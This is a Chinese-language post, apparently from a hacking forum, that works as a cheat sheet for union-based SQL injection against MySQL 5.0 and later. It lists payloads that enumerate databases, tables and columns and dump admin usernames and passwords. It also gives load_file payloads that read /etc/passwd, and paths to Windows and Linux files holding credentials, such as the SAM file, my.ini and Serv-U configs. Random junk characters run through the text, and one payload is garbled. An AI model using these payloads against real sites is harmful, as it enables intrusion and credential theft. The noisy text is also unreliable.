mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。
- b4 W- s: E3 `
2 I! D1 W  ]- @/ b* [

Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
, u' w( [6 @" [中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
: _/ C7 \, m) m|—字段：SCHEMA_NAME ->数据库名称

, `# z( K- P- a7 g6 X|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名
/ I) C: b$ K* Q
|COLUMNS ->存储的字段名表
: o. i* Q5 P0 U" J( L0 {|—字段：TABLE_SCHEMA ->该字段所属数据库名
+ G) X' R  k* T2 P|—字段：TABLE_NAME ->存储所属表的名称

! _6 Z  q+ L" Q/ d: F' e# B% }|—字段：COLUMN_NAME ->该字段的名称
( D0 F2 c3 L: }5 j( K6 l9 |
/ e5 r2 i1 }" I5 I#########################################################################
  R! t( P2 g  o; M##

0×001 获取系统信息:

! i8 N' k/ F3 @union select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
$ m; `6 W1 @* ~, U
/*

2 j. b/ z) n; i2 e) S$ t3 Y/ g  g/ @@@global.version_compile_os 获取系统版本

- \2 r1 F, {, h" s@@datadir 数据库路径
" i( u2 T' R" Y& Rdatabase() 当前数据库名称
0x3c62723e 换行HEX值

*/

6 D9 k3 E! x% W+ v$ f1 C, c######################################################################
' x3 w# m* v9 _  l; g3 D
- ^& k- f* a9 ?& P9 Y. H4 s6 V0×002 获取表名

union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
0 c& P1 z* P, ]% i' }information_schema.tables where table_schema=0x67617264656e /*
, X3 ~# Y* Q7 t5 \
. R% \! I5 }; s# z/ B+ [/*

4 c  e0 J3 [# |0x67617264656e 为当前数据库名
* t# x" L0 `. D
+ _( W; D* Z! ^  o/ |group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
# @' d$ ]0 B8 R
# E8 \  x3 Z9 g5 B4 a/ v4 E$ Z% U*/
- g! c4 i! R" z1 c- u. _" u0 R  o
######################################################################

0×003 获取字段

union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
) b" C: P: g9 ~, ~3 w% winformation_schema.columns where table_name=0x61646d696e and
0 H' ^: G: }  D' b" H& x8 ]& W
+ `, T# L, @  I% _! A: a" ]* r" {8 K
table_schema=0x67617264656e limit 1 /*

! ~. m0 P; \1 S- j- w& ]/*

; U* ?/ @4 K: `' a8 ]1 ngroup_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段
0 @, F1 \' G/ r4 f$ W
0x61646d696e ->选择一个表

1 R+ J* K" \# n9 S0 N$ t0x67617264656e ->数据库名
0 p* U* M  s4 W) x! @& I
9 E, P# n5 Q1 X8 E*/

#####################################################################
" w% w% ]& {) o3 M# r
0×004 获取数据

union select 1,2,3
. m* A' l( [+ M,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
. Y2 L- O% |/ A, W
union select 1,group_concat(id),group_concat(adname),4,5,group_concat
4 a. f1 {: e+ F5 Z3 s5 r(adpassword),6,7,8 from admin

/*

* Q, x, `+ N9 a6 o# ], V0x3c62723e 换行符号HEX编码
( p, [" c) p5 {3 V( f9 |
group_concat 同时获得该字段所有数据
. ?: F1 v+ u2 M) }& l
9 f/ K/ k: s; C2 {' E*/


0 J) U. t( Z8 J" z1 s" g/ ]; D
4 I/ t2 \9 j% w% x% S* N; [

顺便添加一些mysql注入时非常有用的一些东西

7 h5 u2 H" ]. w6 }0 ~简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

3 x* Z$ {) a( w4 g% U1 n- ?1:system_user() 系统用户名
2:user()        用户名
: Q' c, i5 s0 k3:current_user()  当前用户名
4:session_user()连接数据库的用户名
8 Q& W, e8 W; x# a# B5:database()    数据库名
6:version()     MYSQL数据库版本
! C$ l! k8 b- \# D9 U! V4 L: {7:load_file()   MYSQL读取本地文件的函数
; A: O% D5 A  t2 Q8@datadir     读取数据库路径
9@basedir    MYSQL 安装路径
: \' b* I9 {* Z- ^3 z10@version_compile_os   操作系统  Windows Server 2003,
收集的一些路径：
WINDOWS下:
3 ^, B9 i$ C4 K8 C. {1 P$ oc:/boot.ini          //查看系统版本
3 x( f# m5 I+ k$ E/ Dc:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
7 D, Q! d3 U. Sc:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
7 e7 W/ r) v- a) D& bc:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
: Q' \9 {2 P  ?3 w  _' Uc:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
& Z7 v7 e7 k- E. ]# n) jc:\Program Files\RhinoSoft.com\ServUDaemon.exe
6 d, E' ?8 [# B! _C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
9 Q& X, k- Y/ e2 V//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
; }+ H3 d/ z. E% P$ x

c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
" k+ u  d8 `$ `' `. tC:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
8 S* ]7 w" L+ ]+ |2 `1 B, ~C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

1 n9 `, x- ^! s6 y$ O& ]LUNIX/UNIX下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
5 L" O& J" U3 A' v/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
+ V* R/ H8 J5 C; k8 L: v; {/usr/local/app/php5/lib/php.ini //PHP相关设置
, f/ f7 L" @; P; Y* |* }; {) u4 }  t4 V2 N/etc/sysconfig/iptables //从中得到防火墙规则策略
( C0 r8 ^0 }0 `3 u' u# V/etc/httpd/conf/httpd.conf // apache配置文件
( A+ v  I; L( @* ~7 T# E/etc/rsyncd.conf //同步程序配置文件
) c; ]! n# k$ x: Y, Q2 B/etc/my.cnf //mysql的配置文件
# w, C. b4 j9 h* b# ]" Q/etc/redhat-release //系统版本
) p2 m2 S7 x9 s, E) L% {/etc/issue
/etc/issue.net
) H1 p/ E- K; q! V6 U7 m/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
" X' P9 G+ N: I# [! X$ _/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
3 @/ F6 b/ i; ]3 H/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
: a  x) C9 n/ s% J/ d4 Z8 l/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
' z9 D- T: M) R' V! }/ d5 Y/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
7 P( L" D; ~* i# s/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
6 q7 U& M$ O% O: G- mreplace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
2 K4 p  Y8 u, ]( L  ~; R& L上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

$ g' e2 m, o4 Y- C/ J5 ?